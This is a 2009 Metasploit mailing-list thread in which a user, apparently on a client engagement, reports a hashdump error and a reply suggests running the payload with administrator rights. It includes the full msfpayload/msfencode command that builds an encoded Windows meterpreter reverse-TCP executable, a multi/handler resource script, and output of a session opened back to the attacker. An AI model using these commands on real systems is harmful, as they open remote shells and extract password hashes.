Metasploit mailing list archives
Problem with meterpreter, priv, hashdump, etc.
From: wullie19 at ntlworld.com (rogue)
Date: Sat, 18 Apr 2009 22:00:27 +0100
Hi there,

I know you said you started msfconsole as root, but to dump the hashes the meterpreter has to be running with the appropriate privileges. Try right-clicking it and running it as administrator, and see if that helps.

-rogue
Hi all,

I have used msfpayload to create a .exe to connect back to me successfully in the past, and find it to be a great tool. However, today I seem to be hitting the wall when I try to get a hashdump out of the remote system. Here's the scenario:

I should add, this is all done with a fresh local copy from the subversion trunk, revision 6490, and with ~/.msf3 removed entirely and refreshed by a new call to msfconsole before starting.

I created an executable with the following command:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

I started msfconsole (as root) with an rc file:

    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST x.x.x.x
    set LPORT 443
    exploit

My session started just fine:

    resource> use exploit/multi/handler
    resource> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource> set LHOST x.x.x.x
    LHOST => x.x.x.x
    resource> set LPORT 443
    LPORT => 443
    resource> exploit
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...

On the remote system, I started the rv_443.exe and saw the connection back to my msfconsole session:

    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage...
    [*] Uploading DLL (75787 bytes)...
    [*] Upload completed.
    [*] Meterpreter session 1 opened (x.x.x.x:443 -> y.y.y.y:1210)

And, I was able to get info back from the remote system, as expected.

    meterpreter > sysinfo
    Computer: sanitized for the clients protection!
    OS : Windows XP (Build 2600, Service Pack 3).
    meterpreter > ls
    Listing: C:\DOKUME~1\someuser\LOKALE~1\Temp\FFC0EAB.tmp
    =====================================================
    Mode             Size  Type  Last modified                  Name
    ----             ----  ----  -------------                  ----
    40777/rwxrwxrwx  0     dir   Wed Dec 31 19:00:00 -0500 1969  .
    40777/rwxrwxrwx  0     dir   Wed Dec 31 19:00:00 -0500 1969  ..

etc. etc. etc.

However, when I tried to use priv and then execute hashdump, or any other command thereafter, I got errors. I got no errors with 'ls' just after 'use priv', but I did get errors with 'ls' after 'hashdump'.

    meterpreter > hashdump
    [-] Error running command hashdump: wrong number of arguments (0 for 1)
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `initialize'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `exception'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `raise'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/packet_dispatcher.rb:72:in `send_request'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/extensions/priv/priv.rb:44:in `sam_hashes'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb:39:in `cmd_hashdump'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:60:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `call'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/shell.rb:123:in `run'
    /home/wdawson/Software/metasploit/framework3/lib/rex/post/meterpreter/ui/console.rb:58:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/msf/base/sessions/meterpreter.rb:181:in `_interact'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/interactive.rb:48:in `interact'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/core.rb:997:in `cmd_sessions'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in `cmd_exploit'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
    /home/wdawson/Software/metasploit/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:190:in `load_resource'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `each_line'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:185:in `load_resource'
    /home/wdawson/Software/metasploit/framework3/lib/msf/ui/console/driver.rb:103:in `initialize'
    ./msfconsole:82:in `new'
    ./msfconsole:82

Would this be at all due to the fact that the remote system is (seemingly) using a German locale, or is it due to some other factor?

Thanks in advance for any suggestions or insight.